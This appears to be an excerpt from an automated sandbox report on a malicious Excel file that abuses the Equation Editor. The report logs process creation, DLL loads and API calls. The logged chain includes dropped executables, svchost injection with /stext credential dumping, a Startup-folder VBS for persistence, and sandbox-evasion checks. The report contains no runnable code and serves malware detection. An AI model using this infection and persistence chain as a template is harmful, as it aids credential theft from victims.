          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\CKK.exe"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz"
          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pstorec.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mozglue.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: 202404294766578200.xlam.xlsxInitial sample: OLE zip file path = xl/media/image1.jpg
          Source: 202404294766578200.xlam.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000006.00000003.800399276.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000006.00000003.800711700.0000000002C30000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.828579271.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.828375124.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp
          Source: 202404294766578200.xlam.xlsxInitial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_009F42DE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560102 push ds; ret 2_2_03560106
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A10A76 push ecx; ret 3_2_00A10A89
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D60A76 push ecx; ret 6_2_00D60A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00457106 push ecx; ret 7_2_00457119
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0045B11A push esp; ret 7_2_0045B141
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0045E54D push esi; ret 7_2_0045E556
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00457A28 push eax; ret 7_2_00457A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00434E56 push ecx; ret 7_2_00434E69
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_10002806 push ecx; ret 7_2_10002819
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00406EB0 ShellExecuteW,URLDownloadToFileW,7_2_00406EB0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CKK.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\CKK.exeFile created: C:\Users\user\AppData\Local\silvexes\deblaterate.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to dropped file
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0041AA4A
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00A0F98E
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_00A81C41
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D5F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00D5F98E
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DD1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00DD1C41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CB50
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040F7A7 Sleep,ExitProcess,7_2_0040F7A7
          Source: C:\Users\user\AppData\Roaming\CKK.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_3-97405
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
          Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_0041A748
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 9275Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: foregroundWindowGot 1766Jump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeAPI coverage: 4.3 %
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeAPI coverage: 4.6 %
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1724Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 1440Thread sleep count: 309 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 1440Thread sleep time: -154500s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2872Thread sleep count: 126 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2872Thread sleep time: -378000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 1924Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2872Thread sleep count: 9275 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2872Thread sleep time: -27825000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 544Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_00A5DBBE
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A2C2A2 FindFirstFileExW,3_2_00A2C2A2
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A668EE FindFirstFileW,FindClose,3_2_00A668EE
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_00A6698F
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00A5D076
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00A5D3A9
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00A69642
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00A6979D
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00A69B2B
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A65C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00A65C97
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_00DADBBE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D7C2A2 FindFirstFileExW,6_2_00D7C2A2
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB68EE FindFirstFileW,FindClose,6_2_00DB68EE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_00DB698F
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00DAD076
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00DAD3A9
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00DB9642
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00DB979D
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00DB9B2B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB5C97 FindFirstFileW,FindNextFileW,FindClose,6_2_00DB5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409253
